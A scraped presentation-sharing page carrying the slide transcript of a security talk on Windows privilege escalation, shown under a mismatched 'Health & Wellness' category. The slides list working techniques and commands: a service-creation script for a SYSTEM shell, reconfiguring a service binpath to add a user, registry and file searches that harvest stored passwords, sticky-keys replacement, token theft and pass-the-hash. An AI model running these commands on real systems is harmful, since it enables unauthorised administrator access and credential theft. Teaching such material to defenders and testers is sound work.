X

Download Encyclopaedia Of Windows Privilege Escalation PowerPoint Presentation

SlidesFinder-Advertising-Design.jpg

Login   OR  Register
X


Iframe embed code :



Presentation url :

Home / Health & Wellness / Health & Wellness Presentations / Encyclopaedia Of Windows Privilege Escalation PowerPoint Presentation

Encyclopaedia Of Windows Privilege Escalation PowerPoint Presentation

Ppt Presentation Embed Code   Zoom Ppt Presentation

PowerPoint is the world's most popular presentation software which can let you create professional Encyclopaedia Of Windows Privilege Escalation powerpoint presentation easily and in no time. This helps you give your presentation on Encyclopaedia Of Windows Privilege Escalation in a conference, a school lecture, a business proposal, in a webinar and business and professional representations.

The uploader spent his/her valuable time to create this Encyclopaedia Of Windows Privilege Escalation powerpoint presentation slides, to share his/her useful content with the world. This ppt presentation uploaded by slidesfinder in Health & Wellness ppt presentation category is available for free download,and can be used according to your industries like finance, marketing, education, health and many more.

About This Presentation

Encyclopaedia Of Windows Privilege Escalation Presentation Transcript

Slide 1 - ENCYCLOPAEDIA OF WINDOWS PRIVILEGE ESCALATION
Slide 2 - ppt slide no 2 content not found
Slide 3 - Linux Priv Esc Taviso LD_Preload SUID Binaries Race condition/Symlink Crappy perl/python script Bad permissions
Slide 4 - Windows Priv Esc Taviso KiTrap0D Latest win32k.sys font bug metasploit:getSystem() No suid No env passing
Slide 5 - Google(“Windows Privilege Escalation”) How do you escalate your privileges? The process is quite simple actually; you need to get the system account to run a program that you can interact with. This is where the “at” command comes into play. The “at” command schedules a task as a specific time, unlike the “schtasks” command which runs a job under the account that scheduled it, the “at” command runs it as “SYSTEM”. Open a command prompt and type: at 13:01 /interactive cmd HA HA! LAME!!111! Must Be In The Administrators Group
Slide 6 - Google(“Windows Privilege Escalation”) @echo off @break off title root Cls echo Creating service. sc create evil binpath= "cmd.exe /K start" type= own type= interact > nul 2>&1 echo Starting service. sc start evil > nul 2>&1 echo Standing by... ping 127.0.0.1 -n 4 > nul 2>&1 echo Removing service. echo. sc delete evil > nul 2>&1 YOUR PRIV ESC FU IS WEAK Must Be In The Administrators Group
Slide 7 - Stickykeys Replace C:\windows\system32\sethc.exe Logout Hit shift a bunch C:\program.exe Exploits apps that don’t wrap C:\program files\fubar => c:\program.exe Not since windows 2000 Google(“Windows Privilege Escalation”)
Slide 8 - Explain some useful methods Citrix/RDP/Kiosk environments Local workstations, VDI’s etc Post exploitation Escalating privileges User => Higher user Network service => LocalSystem Admin => Domain Admin Useful Windows Priv Esc
Slide 9 - Pure gold Install files, config files, admin notes c:\unattend.txt Clear Text Credentials [GuiUnattended] AdminPassword= AutoLogon=Yes AutoLogonCount=1 OemSkipRegional=1 OemSkipWelcome=1 ServerWelcome=No TimeZone=290 RUNAS /U:LOCALADMIN CMD.EXE
Slide 10 - Slightly more difficult  c:\sysprep.inf [Clear Text] c:\sysprep\sysprep.xml [Base64] BASE64(Credentials) UABhAHMAcwB3AG8AcgBkADEAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBQAGEAcwBzAHcAbwByAGQA false</PlainText> </AdministratorPassword> P a s s w o r d 1 A d m i n i s t r a t o r P a s s w o r d</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 11</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl10_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">GrepFTW findstr /si password *.txt | *.xml | *.ini VNC vnc.ini, ultravnc.ini Easily decrypted Any FTP or other remote access client Most cached credentials can be decrypted http://www.nirsoft.net/password_recovery_tools.html More Easy Passwords</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 12</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl11_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">VNC Again \\HKCU\Software\ORL\WinVNC3\Password Autologin HKLM\SOFTWARE\Microsoft\ Windows NT\Currentversion\ Winlogon Clear text credentials Shell key UserInit key Passwords In Registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 13</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl12_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">SNMP Parameters HKLM\SYSTEM\CurrentControlSet\Services\SNMP\ Putty HKCU\Software\SimonTatham\PuTTY\Sessions Clear text proxy credentials Passwords In Registry reg query HKLM /f password /t REG_SZ /s | clip reg query HKCU /f password /t REG_SZ /s | clip</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 14</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl13_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Windows XP/2003 Always check for GUI apps GUI Attacks</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 15</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl14_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">GUI Attacks</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 16</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl15_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Windows XP/2003 Anything running as SYSTEM with a window Can be attacked from the command line Easy Wins Listview / Treeview RichTextBox EditBox Ruxcon 2004 Shatter Attacks</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 17</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl16_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Stuff like this still works Directory listing as SYSTEM Shatter Attacks</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 18</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl17_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Stuff like this still works Directory listing as SYSTEM Shatter Attacks</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 19</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl18_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Default Permissions Directory Permissions C:\>cacls "Program Files" C:\Program Files BUILTIN\Users:R BUILTIN\Users:(OI)(CI)(IO) GENERIC_READ GENERIC_EXECUTE BUILTIN\Power Users:C BUILTIN\Power Users:(OI)(CI)(IO)C BUILTIN\Administrators:F BUILTIN\Administrators:(OI)(CI)(IO)F NT AUTHORITY\SYSTEM:F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F BUILTIN\Administrators:F CREATOR OWNER:(OI)(CI)(IO)F</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 20</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl19_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Incorrect permissions Directly overwrite the binary When Installers Go Wild C:\Program Files\Symantec\pcAnywhere\awhost32.exe Everyone:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F C:\Program Files\Symantec\pcAnywhere\awrem32.exe Everyone:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 21</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl20_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">On newly created directories Default Permissions C:\>ver Microsoft Windows XP [Version 5.1.2600] C:\>cacls \testperms C:\testperms BUILTIN\Administrators:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F VMXPSP2\Administrator:F CREATOR OWNER:(OI)(CI)(IO)F BUILTIN\Users:(OI)(CI)R BUILTIN\Users:(CI)(special access:) FILE_APPEND_DATA BUILTIN\Users:(CI)(special access:) FILE_WRITE_DATA</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 22</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl21_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">On newly created directories Default Permissions C:\>ver Microsoft Windows [Version 6.1.7600] C:\>cacls \testperms C:\testperms BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 23</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl22_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">On newly created directories Default Permissions C:\testperms>echo testing > test.txt C:\testperms>dir /q Directory of C:\testperms 19/11/2011 12:01 p.m. <DIR> hidden\Brett . 19/11/2011 12:01 p.m. <DIR> NTSERVICE\TrustedInsta.. 19/11/2011 12:01 p.m. hidden\testuser test.txt 1 File(s) 10 bytes 2 Dir(s) 35,323,899,904 bytes free</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 24</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl23_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Metasploit Bug File Permissions http://blog.metasploit.com/2011/02/metasploit-framework-352-released.html On February 1st, Eduardo Prado of Secumania notified us of a privilege escalation vulnerability on multi-user Windows installations of the Metasploit Framework. The problem was due to inherited permissions that allowed an unprivileged user to write files in the Metasploit installation directory.</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 25</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl24_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">File Permissions</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 26</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl25_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">File Permissions</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 27</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl26_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Windows 7 Authenticated Users File Permissions accesschk.exe -qwv \testperms\admin.txt RW NT AUTHORITY\Authenticated Users FILE_APPEND_DATA FILE_EXECUTE FILE_READ_ATTRIBUTES FILE_READ_DATA FILE_READ_EA FILE_WRITE_ATTRIBUTES FILE_WRITE_DATA FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 28</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl27_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">AccessChk Find weak directories Find weak files Cacls / ICacls Quick Discovery accesschk.exe -uwdqs users c:\ accesschk.exe -uwdqs “Authenticated Users” c:\ accesschk.exe -uwqs users c:\*.* accesschk.exe -uwqs “Authenticated Users” c:\*.* cacls "c:\Program Files" /T | findstr Users</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 29</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl28_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Autoruns Enumerate Auto Runs</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 30</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl29_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Autoruns Enumerate Auto Runs</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 31</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl30_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Trojaning Autorun</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 32</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl31_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Trojaning Autorun</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 33</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl32_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Procmon Trojaning Autorun</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 34</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl33_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Trojaning Autorun</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 35</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl34_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">DLL Redirection Can specify the dll to use .local / .manifest Known DLLs cannot be redirected The common system dlls (KnownDLLs reg key) Search Path Path directories with weak permissions File doesn’t exist in system32 Application DLL Searching</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 36</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl35_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">System tasks AT – usually runs tasks as system Scheduled tasks – can run as user Viewing tasks c:\windows\tasks c:\windows\system32\tasks Commands AT schtasks compmgmt.msc Tasks And Jobs Find a task pointing to an insecure location Stuxnet Task Priv Esc</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 37</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl36_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Orphaned Installs Missing files in writable locations C:\hp\services Services</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 38</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl37_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">AccessChk Find weak permissions Windows XP SP3 Services accesschk.exe –uwcqv * DcomLaunch RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW BUILTIN\Power Users SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS READ_CONTROL</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 39</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl38_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Windows XP SP1 Services SSDPSRV RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW NT AUTHORITY\Authenticated Users SERVICE_ALL_ACCESS upnphost RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW NT AUTHORITY\Authenticated Users SERVICE_ALL_ACCESS</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 40</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl39_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Services Permissions</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 41</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl40_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Service control sc.exe Services C:\Tools>sc qc upnphost [SC] GetServiceConfig SUCCESS SERVICE_NAME: upnphost TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Universal Plug and Play Device Host DEPENDENCIES : SSDPSRV SERVICE_START_NAME : NT AUTHORITY\LocalService</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 42</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl41_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Service control sc.exe Services sc config upnphost binpath= “net user hax /add” sc config upnphost obj= “.\LocalSystem” password=“” net stop upnphost net start upnphost</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 43</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl42_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Read and write sensitive keys NtGdiEnableEudc Exploit (MS11-011) Service Tracing key (MS10-059) (Read Cesars Work) Registry symlink vuln (MS10-021) Processes, Threads, Handles, Pipes, Shared memory Inject code into unsecured processes Steal process/thread tokens Hijack handles for write access Long pipes are long AccessChk Has syntax for checking most of these Other Permission Issues accesschk.exe /?</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 44</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl43_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">What is impersonation? The ability of a thread to execute using different a different security token Requires SeImpersonatePrivilege ASPNET, IWAM_computername Local Service, Network Service Token Reading Cesar Cerrudo – Token Kidnapping 1/2/3 (Churrasco) MWR InfoSecurity - Whitepaper Token Impersonation</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 45</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl44_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">ImpersonateNamedPipe @stake, Inc. www.atstake.com Security Advisory Advisory Name: Named Pipe Filename Local Privilege Escalation Release Date: 07/08/2003 Application: Microsoft SQL Server Platform: Windows NT/2000/XP Severity: Local privilege escalation</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 46</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl45_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">ImpersonateNamedPipe Process With SeImpersonate Service Runing As LocalSystem Named Pipe Called Mofo YES I AM A CONNECTING ARROW REQUEST TO CONNECT TO PIPE IMPERSONATENAMEDPIPECLIENT() NOW RUNNING AS LOCALSYSTEM</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 47</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl46_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">Incognito luke_jennings Standalone or Metasploit Finds usable delegation tokens Impersonate Snarf anyone's token from running processes Process Injection Administrator can hijack any users process Admin -> Domain Account</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 48</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl47_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">WCE http://www.ampliasecurity.com/research.html Improved ‘Pass The Hash’ Retrieves hashes from LSASS Modifies in memory current user hashes Steal once use many Grab a domain account hash and travel Admin -> Domain Account</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 49</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl48_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">User -> Admin Can take a bit of time Weak file permissions are rife IIS / Network Service -> SYSTEM Totally doable Abused functionality rather than vulnerability Admin -> Domain Account Is what you want In Summary</span> </td> </tr> </table> <table width="100%" class="table table-hover"> <tr> <td style="width: 90px; color: #525252" valign="top"> <b>Slide 50</b> - </td> <td> <span id="ctl00_ContentPlaceHolder1_rpttans_ctl49_trancontent" style="color: #5D5D5D;font-size: 16px;font-weight: normal;line-height:1.6em">www.insomniasec.com</span> </td> </tr> </table> </div> <div style="clear: both;">&nbsp;</div> </div> </div> <div class="col-md-4"> <!--Google Ad--> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-3708659012052932" crossorigin="anonymous"></script> <!-- Vertical Responsive Ad_1 --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3708659012052932" data-ad-slot="1418013827" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <!--Google Ad--> </div> </div> </div> <script type="text/javascript"> function embedhere() { if (document.getElementById('ifrmcode').style.display == "none") { document.getElementById('ifrmcode').style.display = "block"; document.getElementById('a').innerHTML = "Embed Code"; } else { document.getElementById('ifrmcode').style.display = "none"; document.getElementById('a').innerHTML = "Embed Code"; } } </script> <!--social media con--> <div class="col-md-12 social_con"> <div class="container"> <div class="col-md-12 center-block social text-center"> <a href="https://www.facebook.com/slidesfinder4you" target="_blank" rel="nofollow" title="@slidesfinder4you"> FACEBOOK</a> <a href="https://twitter.com/slidesfinder" target="_blank" rel="nofollow" title="@slidesfinder"> TWITTER</a> <a href="https://www.linkedin.com/company/slidesfinder" target="_blank" rel="nofollow" title="+SlidesFinder"> LINKEDIN</a> <a href="https://www.pinterest.com/slidesfinder" target="_blank" rel="nofollow" title="slidesfinder"> PINTEREST</a> <a href="https://www.instagram.com/slidesfinder/" target="_blank" rel="nofollow" title="slidesfinder"> INSTAGRAM</a> <a href="https://www.youtube.com/user/slidesfinder/" target="_blank" rel="nofollow" title="slidesfinder"> YOUTUBE</a> <a href="https://www.linkedin.com/company/slidesfinder" target="_blank" rel="nofollow" title="slidesfinder"> FLICKR</a> </div> </div> </div> <!--social media con--> <!--footer--> <div class="col-md-12 footer"> <div class="col-md-12"> <h3>Frequently Asked Questions</h3> <p><strong> > About SlidesFinder?</strong></p> <p> Slidesfinder is a website that allows users to upload and share their PowerPoint presentations online. It provides a platform for individuals and businesses to share their ideas and knowledge through presentations, and for others to view and download these presentations for educational or professional purposes. <br /> Slidesfinder offers a wide range of presentation topics and categories, including business, education, science, technology, health, and more. Users can also search for presentations using keywords, tags, or by category. The website provides tools to create professional presentations with rich media, animations, and graphics. <br /><br /> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-3708659012052932" crossorigin="anonymous"></script> <!-- Responsive Horizontal Ad_1 --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3708659012052932" data-ad-slot="4612257022" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <br /><br /> One of the key features of Slidesfinder is its user-friendly interface, which allows users to easily upload, view, and share presentations. Users can also embed their presentations in their websites or blogs using the website's embed code feature. <br /> Slidesfinder also offers premium services, such as the ability to create private presentations and to download presentations in high-quality formats. However, the basic features of Slidesfinder are free to use, making it accessible to anyone who wants to share their ideas and knowledge through presentations. </p> <p><strong> > How do I register with SlidesFinder?</strong></p> <p> Go to registration page (you can see signup link on top of website page) <a href="https://www.slidesfinder.com/signup" target="_blank">https://www.slidesfinder.com/signup</a> . If you have facebook/gmail account them just click on <b>SIGN IN WITH FACEBOOK</b> OR <b>SIGN IN WITH GOOGLE</b> button, by this you will be a registered member of slidesfinder without filling any form, required detail automatically will be fatch from your account. If you do not a Facebook account, then click on "Signup". Fill all required fields and you will be a registered member of slidesfinder. </p> <p><strong> > Is slidesfinder account confirmation is mandatory?</strong></p> <p> Yes it is mandetory to active your account to login. </p> <p><strong> > Do I need to signup/login on SlidesFinder before uploading a PowerPoint presentation?</strong></p> <p> Yes, you need to login with your account before uploading presentation. Your username will be displayed on your uploaded presentation. Your registered email id is needed for sending your stats of uploaded presentation. </p> </div> <div class="col-md-12 text-center"><a href="https://www.slidesfinder.com/frequently-asked-questions"> <button type="button" class="btn btn-default" value="Know More">Know More</button> </a> </div> <div class="container"> <div class="col-md-3" data-aos="fade-up" data-aos-duration="1000"> <ul> <li><strong>RSS FEED</strong></li> <li><a href="https://www.slidesfinder.com/rss/latestuploads">Latest Uploaded</a><li> <li><a href="https://www.slidesfinder.com/rss/mostviewed">Most Viewed</a></li> <li><a href="https://www.slidesfinder.com/rss/mostdownloaded">Most Downloaded</a></li> <li><a href="https://www.slidesfinder.com/rss/presentationblog">Presentation Blog</a></li> <li><a href="https://www.slidesfinder.com/rss/activeusers">Active Users</a></li> </ul> </div> <div class="col-md-3" data-aos="fade-up" data-aos-duration="1000"> <ul> <li><strong>READ ABOUT US</strong></li> <li><a href="https://www.slidesfinder.com/about-us">About Us</a><li> <li><a href="https://www.slidesfinder.com/how-it-works">How it works?</a></li> <li><a href="https://www.slidesfinder.com/disclaimer">Disclaimer</a></li> <li><a href="https://www.slidesfinder.com/sitemap">Sitmap</a></li> <li><a href="https://www.slidesfinder.com/blog/">SlidesFinder Blog</a></li> <li><a href="https://www.slidesfinder.com/contact-us">Contact Us</a></li> </ul> </div> <div class="col-md-3" data-aos="fade-up" data-aos-duration="1000"> <ul> <li><strong>SLIDESFINDER</strong></li> <li><a href="https://www.slidesfinder.com/terms-of-use">Terms of Use</a><li> <li><a href="https://www.slidesfinder.com/privacy-policy">Privacy Policy</a></li> <li><a href="https://www.slidesfinder.com/cookies-policy">Cookies Policy</a></li> <li><a href="https://www.slidesfinder.com/frequently-asked-questions">FAQ's</a></li> <li><a href="mailto:slidesfinder.com@gmail.com">Report an Error</a></li> <li><a href="https://www.slidesfinder.com/ppt-presentation-search-engine.aspx">PPT Presentation Search Engine</a></li> <li><a href="https://www.slidesfinder.com/request-ppt-presentation.aspx">Request For Ppt</a></li> <li><a href="https://www.slidesfinder.com/Live-Chat.html" onclick="window.open(this.href, 'windowName', 'width=200, height=200, left=24, top=24, scrollbars, resizable'); return false;">Live Chat</a></li> </ul> </div> <div class="col-md-3" data-aos="fade-up" data-aos-duration="1000"> <ul> <li><strong>PRESENTATIONS</strong></li> <li><a href="https://www.slidesfinder.com/latest-presentations/1?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Latest Presentation">Latest Presentation</a><li> <li><a href="https://www.slidesfinder.com/featured-presentations/1?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Featured Presentation">Featured Presentation</a></li> <li><a href="https://www.slidesfinder.com/most-viewed-presentations/1?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Most Viewed Presentation">Most Viewed Presentation</a></li> <li><a href="https://www.slidesfinder.com/presentation-categories?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Category Presentation">Category Presentation</a></li> <li><a href="https://www.slidesfinder.com/alphabet-ppt-collection.aspx?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Alphabetical Presentation">Alphabetical Presentation</a></li> <li><a href="https://www.slidesfinder.com/free-templates/?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=>Free Ppt Templates">Free Ppt Templates</a></li> <li><a href="https://www.slidesfinder.com/free-templates/powerpoint-backgrounds?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Free Premium Ppt Templates">Free Premium Ppt Templates</a></li> <li><a href="https://www.slidesfinder.com/templates/editable-ppt-templates?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Premium Ppt Templates">Premium Ppt Templates</a></li> <li><a href="https://www.slidesfinder.com/templates/editable-word-templates?utm_source=webfootermenu&utm_medium=menuclick&utm_campaign=Premium Word Templates">Premium 